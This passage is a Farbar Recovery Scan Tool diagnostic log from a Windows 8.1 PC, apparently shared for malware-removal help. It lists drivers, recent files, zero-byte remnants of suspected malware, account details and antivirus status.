RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [80384 2015-01-14] (Microsoft Windows Hardware Compatibility Publisher -> BlackBerry Limited) R3 rimvndis; C:\Windows\System32\Drivers\rimvndis6_AMD64.sys [18432 2015-05-26] (Microsoft Windows Hardware Compatibility Publisher -> BlackBerry Limited) R3 RimVSerPort; C:\Windows\system32\DRIVERS\RimSerial_AMD64.sys [44544 2012-12-10] (Microsoft Windows Hardware Compatibility Publisher -> Research in Motion Ltd) R3 SPUVCbv; C:\Windows\System32\Drivers\SPUVCbv64.sys [749824 2017-11-27] (Sunplus Innovation Technology Inc. -> Sunplus Innovation Technology Inc.) S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.) R3 tap0901; C:\Windows\system32\DRIVERS\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project) S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2018-04-18] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.) S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation) S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Windows -> Microsoft Corporation) S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Windows -> Microsoft Corporation) ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One month (created) ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2019-02-16 09:55 - 2019-02-16 09:55 - 000072864 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys 2019-02-16 09:54 - 2019-02-16 09:54 - 000274416 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys 2019-02-16 09:54 - 2019-02-16 09:54 - 000127136 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys 2019-02-16 09:54 - 2019-02-16 09:54 - 000114040 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys 2019-02-16 07:59 - 2019-02-16 07:59 - 000002719 _____ C:\Users\Stanley\Desktop\JRT.txt 2019-02-16 07:45 - 2019-02-16 07:53 - 000001638 _____ C:\Users\Stanley\Desktop\Rkill.txt 2019-02-16 07:45 - 2019-02-16 07:45 - 000000000 ____D C:\Users\Stanley\Desktop\rkill 2019-02-16 07:38 - 2019-02-16 07:44 - 000696026 _____ C:\TDSSKiller.3.1.0.26_16.02.2019_07.38.18_log.txt 2019-02-16 07:35 - 2019-02-16 07:36 - 000004670 _____ C:\TDSSKiller.3.1.0.26_16.02.2019_07.35.18_log.txt 2019-02-16 07:31 - 2019-02-16 07:31 - 000004416 _____ C:\TDSSKiller.3.1.0.26_16.02.2019_07.31.06_log.txt 2019-02-16 07:23 - 2019-02-16 07:26 - 000000000 ____D C:\AdwCleaner 2019-02-15 02:09 - 2019-02-15 02:10 - 000002383 _____ C:\Users\Stanley\Desktop\Chrome Plus - Chrome.lnk 2019-02-15 02:09 - 2019-02-15 02:09 - 000002427 _____ C:\Users\Stanley\Desktop\WORKHARDGROUP 2 - Chrome.lnk 2019-02-15 02:09 - 2019-02-15 02:09 - 000002427 _____ C:\Users\Stanley\Desktop\WORKHARDGROUP - Chrome.lnk 2019-02-15 02:08 - 2019-02-15 02:08 - 000002427 _____ C:\Users\Stanley\Desktop\WORKHARDGROUP 3 - Chrome.lnk 2019-02-15 00:32 - 2019-02-15 00:32 - 000000000 ____D C:\Users\Stanley\AppData\Local\mbam 2019-02-15 00:31 - 2019-02-15 00:31 - 000001883 _____ C:\Users\Public\Desktop\Malwarebytes.lnk 2019-02-15 00:31 - 2019-02-15 00:31 - 000000000 ____D C:\Users\Stanley\AppData\Local\mbamtray 2019-02-15 00:30 - 2019-02-15 00:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes 2019-02-15 00:30 - 2019-02-15 00:30 - 000000000 ____D C:\ProgramData\Malwarebytes 2019-02-15 00:30 - 2019-02-15 00:30 - 000000000 ____D C:\Program Files\Malwarebytes 2019-02-15 00:30 - 2019-01-08 15:32 - 000153328 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys 2019-02-14 02:41 - 2019-02-16 09:02 - 000000000 ____D C:\Users\Stanley\AppData\LocalLow\uTorrent 2019-02-13 22:08 - 2019-02-14 02:40 - 000000414 _____ C:\Windows\Tasks\HPCeeScheduleFor#Strazzo.RoseGold##.job 2019-02-13 22:08 - 2019-02-13 22:08 - 000003256 _____ C:\Windows\System32\Tasks\HPCeeScheduleFor#Strazzo.RoseGold## 2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\SysWOW64\taskshostservices.exe 2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\SysWOW64\Drivers\WinmonProcessMonitor.sys 2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\SysWOW64\Drivers\winmonfs.sys 2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\SysWOW64\Drivers\winmon.sys 2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\system32\taskshostservices.exe 2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\system32\Drivers\WinmonProcessMonitor.sys 2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\mssecsvc.exe 2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\SysWOW64\SecureBootThemes 2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\system32\SecureBootThemes 2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\SpeechsTracing 2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\SecureBootThemes 2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\AppDiagnostics 2019-02-12 18:32 - 2019-02-13 14:18 - 000000000 ____D C:\Program Files (x86)\SMADAV 2019-02-12 18:32 - 2019-02-13 05:55 - 000000000 __SHD C:\[Smad-Cage] 2019-02-12 18:32 - 2019-02-12 18:32 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Smadav 2019-02-12 18:31 - 2019-02-12 18:31 - 001698648 _____ (Smadsoft ) C:\Users\Stanley\Downloads\smadav2019rev126.exe 2019-02-12 18:05 - 2019-02-12 18:06 - 064531912 _____ (Malwarebytes ) C:\Users\Stanley\Downloads\mb3-setup-consumer-3.7.1.2839-1.0.538-1.0.9208.exe 2019-02-12 17:43 - 2019-02-16 09:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UC Browser 2019-02-12 05:59 - 2019-02-12 05:59 - 000104160 _____ C:\Users\Stanley\Downloads\Shortcut.txt 2019-02-12 05:53 - 2019-02-18 01:25 - 000000000 ____D C:\Users\Stanley\Downloads\FRST 2019-02-12 05:33 - 2019-02-18 01:24 - 000000000 ____D C:\FRST 2019-02-10 21:40 - 2019-02-10 21:40 - 000001483 _____ C:\Users\Stanley\Desktop\iexplore.exe - Shortcut.lnk 2019-02-10 07:29 - 2019-02-10 07:34 - 000003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1692593245-3285590566-2148222763-500 2019-02-10 07:28 - 2019-02-10 07:28 - 000000000 ____D C:\Users\Administrator\AppData\Roaming\Hewlett-Packard 2019-02-10 07:25 - 2019-02-10 20:12 - 000000000 ____D C:\Users\Administrator\AppData\Roaming\Apple Computer 2019-02-10 07:25 - 2019-02-10 07:25 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Hewlett-Packard 2019-02-10 07:25 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator\OpenVPN 2019-02-10 07:25 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator\AppData\Local\Apple Computer 2019-02-10 07:24 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator\AppData\Local\Packages 2019-02-10 07:24 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator 2019-02-10 07:24 - 2019-02-10 07:24 - 000001442 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2019-02-10 07:24 - 2019-02-10 07:24 - 000000020 ___SH C:\Users\Administrator\ntuser.ini 2019-02-10 07:24 - 2019-02-10 07:24 - 000000000 ____D C:\Users\Administrator\AppData\Roaming\Adobe 2019-02-10 07:24 - 2019-02-10 07:24 - 000000000 ____D C:\Users\Administrator\AppData\Local\Google 2019-02-10 07:24 - 2014-11-22 04:18 - 000000369 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk 2019-02-10 07:24 - 2014-11-22 04:18 - 000000369 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk 2019-02-09 02:21 - 2019-02-09 02:21 - 000000000 ____D C:\Windows\pss 2019-02-09 01:24 - 2019-02-09 01:24 - 000000146 _____ C:\Users\Stanley\Desktop\Windows Defender - Shortcut.lnk 2019-02-08 22:53 - 2019-02-08 22:56 - 007406936 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe 2019-02-08 22:53 - 2019-02-08 22:56 - 001536112 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe 2019-02-08 22:53 - 2019-02-08 22:53 - 000000000 ____D C:\Users\#Strazzo.RoseGold## 2019-02-07 05:47 - 2019-02-07 05:47 - 000001178 _____ C:\Users\Public\Desktop\PhoneRescue.lnk 2019-02-07 05:40 - 2019-02-07 08:03 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Decipher Media 2019-02-07 05:25 - 2019-02-07 05:36 - 045726776 _____ (Decipher Media) C:\Users\Stanley\Downloads\DecipherBackupRepair.exe 2019-02-07 04:32 - 2019-02-07 04:39 - 040754877 _____ (iMacTools ) C:\Users\Stanley\Downloads\iBackupViewerSetup.exe 2019-02-07 04:26 - 2019-02-07 04:26 - 000000000 ____D C:\Users\Stanley\AppData\Local\iBackup Viewer 2019-02-07 04:26 - 2019-02-07 04:26 - 000000000 ____D C:\Users\Stanley\AppData\Local\CrashRpt 2019-02-07 03:11 - 2019-02-07 03:11 - 000000000 ____D C:\Users\Stanley\Documents\Apowersoft 2019-02-07 03:10 - 2019-02-07 03:10 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Apowersoft 2019-02-07 02:04 - 2019-02-07 02:04 - 000000000 ____D C:\Users\Stanley\AppData\Local\Reincubate Temporary Files 2019-02-06 20:03 - 2019-02-06 20:06 - 006258864 _____ (iMobie Inc. ) C:\Users\Stanley\Downloads\phonebrowse-64-setup.exe 2019-02-06 19:48 - 2019-02-06 19:54 - 021424360 _____ (Reincubate Ltd) C:\Users\Stanley\Downloads\iphonebackupextractor-latest.exe 2019-02-06 05:53 - 2019-02-15 01:38 - 000000000 ____D C:\Users\Stanley\Downloads\MM_VideoDownload 2019-02-06 05:53 - 2019-02-06 05:53 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\MobiMoverUI 2019-02-06 05:30 - 2019-02-06 05:47 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\SystemAcCrux 2019-02-06 04:46 - 2019-02-06 06:33 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\WindSolutions 2019-02-06 04:46 - 2019-02-06 06:33 - 000000000 ____D C:\ProgramData\WindSolutions 2019-02-06 04:46 - 2019-02-06 04:46 - 000000000 ____D C:\Users\Stanley\AppData\Local\FoneDog 2019-02-06 04:26 - 2019-02-06 04:27 - 008046792 _____ (WindSolutions) C:\Users\Stanley\Downloads\Install_CopyTransControlCenter.exe 2019-02-06 04:23 - 2019-02-06 04:23 - 000000000 ____D C:\Users\Stanley\AppData\Local\Aiseesoft Studio 2019-02-05 11:35 - 2019-02-06 04:26 - 030804013 _____ (FoneDog ) C:\Users\Stanley\Downloads\fonedog-ios-toolkit.exe 2019-02-05 11:35 - 2019-02-05 11:35 - 000001133 _____ C:\Users\Stanley\Desktop\Syncios.lnk 2019-02-05 07:42 - 2019-02-05 07:42 - 000002343 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Syncios Data Recovery.lnk 2019-02-05 07:42 - 2019-02-05 07:42 - 000002331 _____ C:\Users\Public\Desktop\Syncios Data Recovery.lnk 2019-02-05 07:42 - 2019-02-05 07:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Syncios 2019-02-05 07:42 - 2019-02-05 07:42 - 000000000 ____D C:\Program Files (x86)\Syncios Data Recovery 2019-02-05 01:46 - 2019-02-05 01:46 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Apple Computer 2019-02-05 00:51 - 2019-02-05 00:51 - 000000000 ____D C:\Users\Stanley\Documents\Wondershare 2019-02-05 00:51 - 2019-02-05 00:51 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\MobileBackupForeverIni 2019-02-05 00:50 - 2019-02-05 00:50 - 000000000 ____D C:\Users\Stanley\AppData\Local\AdvinstAnalytics 2019-02-05 00:49 - 2019-02-05 00:49 - 000140800 _____ C:\Users\Stanley\AppData\Local\installer.dat 2019-02-05 00:31 - 2019-02-05 01:39 - 000000000 ____D C:\Users\Stanley\AppData\Local\Deployment 2019-02-05 00:31 - 2019-02-05 00:31 - 000000000 ____D C:\Users\Stanley\AppData\Local\Apps\2.0 2019-02-04 23:57 - 2019-02-04 23:57 - 000000000 ____D C:\Users\Stanley\AppData\Local\DigiDNA 2019-02-04 23:54 - 2019-02-05 00:05 - 112497792 _____ C:\Users\Stanley\Downloads\setup_syncios (1).exe 2019-02-04 22:32 - 2019-02-04 22:32 - 000000000 ____D C:\Users\RoseGold\Documents\Syncios 2019-02-02 10:43 - 2019-02-02 10:43 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Apple 2019-01-31 12:39 - 2019-01-31 12:39 - 000048210 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-23 at 1.56.07 PM.jpeg 2019-01-31 10:20 - 2019-01-31 10:20 - 000052446 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-21 at 11.46.14 AM.jpeg 2019-01-31 10:20 - 2019-01-31 10:20 - 000052446 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-21 at 11.46.14 AM (1).jpeg 2019-01-31 10:20 - 2019-01-31 10:20 - 000046824 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-20 at 8.50.51 PM.jpeg 2019-01-31 10:17 - 2019-01-31 10:17 - 000046880 _____ C:\Users\Stanley\Downloads\usd slip1.jpeg 2019-01-30 07:56 - 2019-02-10 07:34 - 000003600 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1692593245-3285590566-2148222763-1004 2019-01-30 07:52 - 2019-01-31 06:21 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\hpqlog 2019-01-30 07:51 - 2019-02-05 01:46 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Syncios 2019-01-30 07:51 - 2019-02-05 01:46 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Apple Computer 2019-01-30 07:51 - 2019-01-30 07:52 - 000000000 ____D C:\Users\RoseGold\.android 2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Syncios Data Transfer 2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\SyncDroid 2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Research In Motion 2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Local\BlackBerry 2019-01-30 07:48 - 2019-02-12 06:38 - 000001446 _____ C:\Users\RoseGold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2019-01-30 07:48 - 2019-01-30 07:52 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Packages 2019-01-30 07:48 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold 2019-01-30 07:48 - 2019-01-30 07:48 - 000000020 ___SH C:\Users\RoseGold\ntuser.ini 2019-01-30 07:48 - 2019-01-30 07:48 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Adobe 2019-01-30 07:48 - 2019-01-30 07:48 - 000000000 ____D C:\Users\RoseGold\AppData\Local\VirtualStore 2019-01-30 07:48 - 2019-01-30 07:48 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Google 2019-01-30 07:48 - 2014-11-22 04:18 - 000000369 _____ C:\Users\RoseGold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk 2019-01-30 07:48 - 2014-11-22 04:18 - 000000369 _____ C:\Users\RoseGold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk 2019-01-27 09:06 - 2019-01-27 09:06 - 000202698 _____ C:\Users\Stanley\Downloads\114328 (1).pdf 2019-01-27 08:22 - 2019-01-27 08:22 - 000202698 _____ C:\Users\Stanley\Downloads\114328.pdf 2019-01-26 22:39 - 2019-01-26 22:39 - 000001160 _____ C:\Users\Stanley\Downloads\converted_1082592538.txt 2019-01-26 22:19 - 2019-01-26 22:19 - 000000000 ___HD C:\OneDriveTemp 2019-01-26 22:19 - 2019-01-26 22:19 - 000000000 ____D C:\Users\Stanley\OneDrive 2019-01-26 14:55 - 2019-01-26 14:55 - 000075241 _____ C:\Users\Stanley\Downloads\newocr.com-20190126135542.pdf 2019-01-26 14:01 - 2019-01-26 14:01 - 000351579 _____ C:\Users\Stanley\Downloads\001 (2).pdf 2019-01-26 13:59 - 2019-01-26 13:59 - 000315587 _____ C:\Users\Stanley\Downloads\001 (1).pdf 2019-01-26 13:53 - 2019-01-26 13:53 - 000271265 _____ C:\Users\Stanley\Downloads\topdf.zip 2019-01-26 13:53 - 2019-01-26 13:52 - 000315587 _____ C:\Users\Stanley\Downloads\001.pdf 2019-01-26 06:02 - 2019-01-26 06:02 - 000001759 _____ C:\Users\Public\Desktop\iTunes.lnk 2019-01-26 06:02 - 2019-01-26 06:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes 2019-01-26 06:01 - 2019-01-26 06:01 - 000000000 ____D C:\Program Files\iPod 2019-01-26 06:00 - 2019-01-26 06:02 - 000000000 ____D C:\Program Files\iTunes 2019-01-26 05:48 - 2019-01-26 05:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud 2019-01-22 12:20 - 2019-01-22 12:21 - 000860720 _____ C:\Users\Stanley\Downloads\Ηλεκτρολογικός εξοπλισμός.2016714105916.xlsx 2019-01-21 12:46 - 2019-01-21 12:46 - 003864349 _____ C:\Users\Stanley\Downloads\GPP002-Schneider-Ersatzteile (1).xlsx 2019-01-21 09:17 - 2019-01-21 09:17 - 000215164 _____ C:\Users\Stanley\Downloads\Hunter.Killer.2018.HC.HDRip.XviD.AC3-EVO-HI222.srt 2019-01-21 02:12 - 2018-12-14 15:23 - 000107584 ____N C:\Users\Stanley\Downloads\Hunter.Killer.2018.HC.HDRip.XviD.AC3-EVO-HI.srt 2019-01-21 02:09 - 2019-01-21 09:18 - 000039742 _____ C:\Users\Stanley\Downloads\hunter_killer_english_1340435.zip 2019-01-19 16:06 - 2019-02-10 22:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Monopoly Here & Now Edition 2019-01-19 16:06 - 2019-01-19 16:06 - 000000000 ____D C:\ProgramData\TEMP 2019-01-19 16:02 - 2019-01-19 16:03 - 015141368 _____ C:\Users\Stanley\Downloads\MonopolyHNSetup.exe ==================== One month (modified) ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2019-02-18 01:27 - 2018-05-12 16:21 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\uTorrent 2019-02-18 01:21 - 2013-08-22 14:36 - 000000000 ____D C:\Windows\Inf 2019-02-17 07:59 - 2018-06-03 09:29 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\vlc 2019-02-16 10:34 - 2018-05-03 17:58 - 000003600 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1692593245-3285590566-2148222763-1001 2019-02-16 09:05 - 2014-11-22 04:09 - 000176404 _____ C:\Windows\system32\PerfStringBackup.INI 2019-02-16 09:02 - 2018-12-27 19:56 - 000000000 ___RD C:\Users\Stanley\iCloudDrive 2019-02-16 09:00 - 2013-08-22 15:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT 2019-02-16 08:59 - 2018-06-03 04:27 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\DMCache 2019-02-16 07:54 - 2018-05-12 16:22 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Lavasoft 2019-02-16 07:54 - 2018-05-12 16:21 - 000000000 ____D C:\ProgramData\Lavasoft 2019-02-16 07:54 - 2018-05-12 16:21 - 000000000 ____D C:\Program Files (x86)\Lavasoft 2019-02-16 07:32 - 2013-08-22 14:25 - 000524288 ___SH C:\Windows\system32\config\BBI 2019-02-16 06:09 - 2018-05-09 14:30 - 000507392 ___SH C:\Users\Stanley\Downloads\Thumbs.db 2019-02-16 05:57 - 2018-05-04 17:06 - 000003842 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1525449700 2019-02-16 05:57 - 2018-05-04 17:01 - 000001050 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera Browser.lnk 2019-02-16 05:57 - 2018-05-04 17:00 - 000000000 ____D C:\Program Files\Opera 2019-02-15 01:31 - 2018-05-04 07:27 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\DriverPack Easy Search 2019-02-15 00:15 - 2018-06-24 08:33 - 000002320 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2019-02-15 00:08 - 2018-05-22 09:22 - 000168960 ___SH C:\Users\Stanley\Desktop\Thumbs.db 2019-02-15 00:03 - 2018-06-04 23:16 - 000000000 ____D C:\Users\Stanley\AppData\LocalLow\Temp 2019-02-14 02:43 - 2018-05-04 20:08 - 000001326 _____ C:\Users\Public\Desktop\Skype.lnk 2019-02-14 02:43 - 2018-05-04 20:08 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype 2019-02-14 02:25 - 2018-04-23 21:43 - 000000000 ____D C:\lNTEL 2019-02-14 02:25 - 2018-04-10 15:07 - 000000000 ____D C:\Users\Stanley\Desktop\URCH 2019-02-14 02:23 - 2018-06-05 13:20 - 000000000 ____D C:\Users\Stanley\Desktop\final 2019-02-14 02:23 - 2018-05-09 22:35 - 000000000 __SHD C:\Users\Stanley\AppData\Roaming\C67FA6 2019-02-12 21:30 - 2018-05-03 17:51 - 000000000 ____D C:\Users\Stanley 2019-02-12 06:38 - 2018-05-12 16:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft 2019-02-10 23:14 - 2018-06-06 18:15 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Syncios Data Transfer 2019-02-10 23:08 - 2013-08-22 16:36 - 000000000 ____D C:\Windows\Registration 2019-02-10 22:09 - 2018-05-14 11:19 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinAce 2019-02-10 22:04 - 2018-05-04 12:30 - 000000000 ____D C:\Users\Stanley\AppData\LocalLow\Mozilla 2019-02-10 07:30 - 2013-08-22 16:36 - 000000000 ____D C:\Windows\AppReadiness 2019-02-09 01:51 - 2018-10-18 00:37 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iMobie 2019-02-09 01:51 - 2018-10-18 00:37 - 000000000 ____D C:\Program Files (x86)\iMobie 2019-02-08 23:59 - 2018-05-03 23:45 - 000000082 _____ C:\Windows\SysWOW64\winsevr.dat 2019-02-08 23:36 - 2018-06-03 04:27 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\IDM 2019-02-08 23:00 - 2018-10-18 01:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iSkysoft 2019-02-08 23:00 - 2018-10-18 01:09 - 000000000 ____D C:\ProgramData\iSkysoft 2019-02-07 02:08 - 2018-10-18 00:38 - 000000000 ____D C:\Users\Stanley\AppData\Local\iMobie_Inc 2019-02-06 07:21 - 2018-10-20 09:06 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Syncios Data Recovery 2019-02-06 06:29 - 2018-04-24 22:26 - 000000000 ____D C:\Program Files\Recuva 2019-02-06 06:23 - 2018-05-19 23:54 - 000363748 _____ C:\Users\Stanley\Desktop\arms & ammunition.txt 2019-02-06 05:57 - 2018-06-03 04:27 - 000000000 ____D C:\Users\Stanley\Downloads\Compressed 2019-02-05 11:33 - 2018-06-06 18:08 - 000000000 ____D C:\Program Files (x86)\Anvsoft 2019-02-05 09:51 - 2018-06-06 21:44 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Apple Computer 2019-02-05 07:07 - 2018-10-18 00:12 - 000000000 ____D C:\ProgramData\Wondershare 2019-02-05 07:06 - 2018-10-18 01:06 - 000000000 ____D C:\Users\Public\Documents\iSkysoft 2019-02-05 07:05 - 2018-10-18 01:09 - 000000000 ____D C:\Program Files (x86)\iSkysoft 2019-02-05 01:31 - 2018-10-18 00:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare 2019-02-05 00:37 - 2018-10-18 00:06 - 000000000 ____D C:\Users\Public\Documents\Wondershare 2019-02-05 00:16 - 2018-06-06 18:15 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Syncios 2019-01-26 22:19 - 2018-12-27 19:45 - 000000000 ___RD C:\Users\Stanley\OneDrive (3).old 2019-01-25 09:31 - 2018-06-04 00:07 - 000000000 ____D C:\Users\Stanley\AppData\Local\ElevatedDiagnostics 2019-01-24 10:28 - 2018-06-03 08:56 - 000000887 _____ C:\Users\Public\Desktop\VLC media player.lnk 2019-01-23 15:45 - 2018-05-04 07:39 - 000000000 ____D C:\Program Files (x86)\TeamViewer ==================== Files in the root of some directories ======= 2018-08-18 10:56 - 2014-12-19 17:43 - 000000034 _____ () C:\Users\Stanley\AppData\Roaming\pdfdrawcodec.dll 2019-02-05 00:49 - 2019-02-05 00:49 - 000140800 _____ () C:\Users\Stanley\AppData\Local\installer.dat 2018-06-02 10:15 - 2018-06-02 10:15 - 000007611 _____ () C:\Users\Stanley\AppData\Local\Resmon.ResmonCfg Some zero byte size files/folders: ========================== C:\Windows\mssecsvc.exe C:\Windows\SysWOW64\taskshostservices.exe C:\Windows\System32\taskshostservices.exe C:\Windows\System32\Drivers\WinmonProcessMonitor.sys C:\Windows\SysWOW64\Drivers\winmon.sys C:\Windows\SysWOW64\Drivers\winmonfs.sys C:\Windows\SysWOW64\Drivers\WinmonProcessMonitor.sys ==================== Bamital & volsnap ====================== (There is no automatic fix for files that do not pass verification.) C:\Windows\system32\winlogon.exe => File is digitally signed C:\Windows\system32\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\system32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\system32\services.exe => File is digitally signed C:\Windows\system32\User32.dll => File is digitally signed C:\Windows\SysWOW64\User32.dll => File is digitally signed C:\Windows\system32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\system32\rpcss.dll => File is digitally signed C:\Windows\system32\dnsapi.dll => File is digitally signed C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed C:\Windows\system32\dllhost.exe => File is digitally signed C:\Windows\SysWOW64\dllhost.exe => File is digitally signed C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2019-02-13 14:45 ==================== End of FRST.txt ============================
  6. addition.txt Additional scan result of Farbar Recovery Scan Tool (x64) Version: 13.02.2019 Ran by #Strazzo.RoseGold## (17-02-2019 12:47:56) Running from C:\Users\Stanley\Downloads\FRST Windows 8.1 Enterprise (Update) (X64) (2018-05-03 16:52:27) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= #Strazzo.RoseGold## (S-1-5-21-1692593245-3285590566-2148222763-1001 - Administrator - Enabled) => C:\Users\Stanley Administrator (S-1-5-21-1692593245-3285590566-2148222763-500 - Administrator - Enabled) => C:\Users\Administrator Guest (S-1-5-21-1692593245-3285590566-2148222763-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-1692593245-3285590566-2148222763-1003 - Limited - Disabled) RoseGold (S-1-5-21-1692593245-3285590566-2148222763-1004 - Administrator - Enabled) => C:\Users\RoseGold ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B} AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) µTorrent (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\uTorrent) (Version: 3.5.5.44994 